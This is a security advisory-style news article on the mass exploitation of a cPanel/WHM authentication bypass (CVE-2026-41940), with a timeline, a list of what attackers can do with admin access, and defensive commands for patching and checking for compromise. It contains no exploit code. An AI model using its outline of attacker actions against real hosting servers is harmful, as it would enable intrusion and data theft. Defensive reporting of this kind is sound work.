More than 40,000 servers running the widely deployed cPanel and WHM web hosting control panel software have been compromised in an ongoing exploitation campaign, according to new reporting from SecurityWeek. The attacks target CVE-2026-41940, a critical authentication bypass zero-day that was recently patched by WebPros but had already been actively exploited in the wild before a fix was available.
The Vulnerability: CVE-2026-41940
CVE-2026-41940 is a missing authentication vulnerability in WebPros cPanel, WHM, and WP2 (WordPress Squared). The flaw allows unauthenticated remote attackers to bypass the authentication mechanisms protecting the cPanel administrative interface and gain full control over affected hosting servers.
| Detail | Value |
|---|---|
| CVE | CVE-2026-41940 |
| Affected Software | cPanel, WHM, WP2 (WordPress Squared) |
| Vulnerability Type | Missing Authentication |
| Impact | Full administrative access |
| Exploitation | Active — zero-day before patch |
| Patch Status | Available — update immediately |
cPanel is one of the most widely used web hosting control panels in the world, deployed on millions of servers by web hosting providers, managed hosting platforms, and individual server operators. A critical authentication bypass in cPanel effectively hands an attacker the keys to every website, email account, database, and file hosted on the affected server.
Timeline of Exploitation
This vulnerability's exploitation history stretches back through April 2026:
- Late April 2026 — CVE-2026-41940 was disclosed by WebPros as an emergency patch; a proof-of-concept (PoC) became available shortly after disclosure
- April 29, 2026 — CISA added the flaw to its Known Exploited Vulnerabilities (KEV) catalog, ordering federal agencies to patch by a May 2026 deadline
- April–May 2026 — "Sorry" ransomware group confirmed exploiting the flaw in mass attacks against hosting providers
- May 4, 2026 — SecurityWeek reports over 40,000 servers have now been confirmed compromised in the ongoing campaign
The rapid escalation from disclosure to tens of thousands of compromised servers underscores how quickly exploitation scales when critical authentication bypass flaws affect widely deployed software with a large attack surface.
What Attackers Can Do with cPanel Access
Administrative access to a cPanel instance gives attackers complete control over the hosting environment, enabling:
- Website defacement or malware injection across all hosted domains
- Email compromise — accessing or redirecting hosted email accounts for phishing or credential theft
- Database exfiltration — dumping MySQL/PostgreSQL databases containing customer data, credentials, and PII
- Cryptominer installation — leveraging server resources for illicit cryptocurrency mining
- Ransomware deployment — encrypting hosted files and extorting server operators
- Credential harvesting — extracting stored FTP, database, and application credentials
- Pivoting — using compromised servers as launch points for attacks on connected infrastructure
The "Sorry" ransomware group's confirmed exploitation of this flaw for ransomware deployment is particularly alarming for shared hosting providers, where a single compromised cPanel installation can impact hundreds or thousands of individual website operators.
Affected Versions and Patch
WebPros released an emergency patch for CVE-2026-41940 in late April 2026. All cPanel, WHM, and WP2 installations should be updated immediately to the latest patched versions.
Check Your cPanel Version
# Check installed cPanel version
cat /usr/local/cpanel/version
# Or via WHM interface
# Navigate to: WHM > Server Configuration > Update PreferencesApply the Update
# Run cPanel update via command line
/scripts/upcp --force
# Check for available updates
/usr/local/cpanel/scripts/check_cpanel_rpms --fixVerify No Compromise Has Occurred
If your cPanel installation was unpatched during the active exploitation window, perform a thorough compromise assessment:
# Check for unauthorized admin accounts
whmapi1 listaccts | grep -i admin
# Review cPanel access logs for suspicious authentication patterns
grep "Invalid login" /usr/local/cpanel/logs/access_log | tail -200
# Check for new cron jobs (common persistence mechanism)
crontab -l
for user in $(cut -f1 -d: /etc/passwd); do
echo "=== $user ==="; crontab -u $user -l 2>/dev/null
doneMitigation Recommendations
For organizations running cPanel-based hosting infrastructure:
- Patch immediately — Apply the CVE-2026-41940 fix via
/scripts/upcp --forceor through WHM > Update Management - Enable automatic security updates — Configure cPanel to apply security patches automatically
- Restrict WHM access — Limit WHM administrative interface access to trusted IP ranges via firewall rules
- Audit admin accounts — Review all WHM and cPanel accounts for unauthorized additions
- Enable two-factor authentication — Require 2FA for all cPanel and WHM logins
- Monitor access logs — Set up alerting for authentication anomalies and off-hours administrative access
- Review file integrity — Scan hosted websites for injected malware or webshells
Federal Guidance
CISA's addition of CVE-2026-41940 to the KEV catalog mandates that all US federal civilian executive branch (FCEB) agencies patch by the specified deadline. Non-federal organizations are also strongly advised to treat KEV-listed vulnerabilities as priority patches.
The scale of confirmed compromises — over 40,000 servers — places this among the larger server-side exploitation campaigns of 2026, rivaling historical events like the mass exploitation of Microsoft Exchange ProxyLogon and Log4Shell.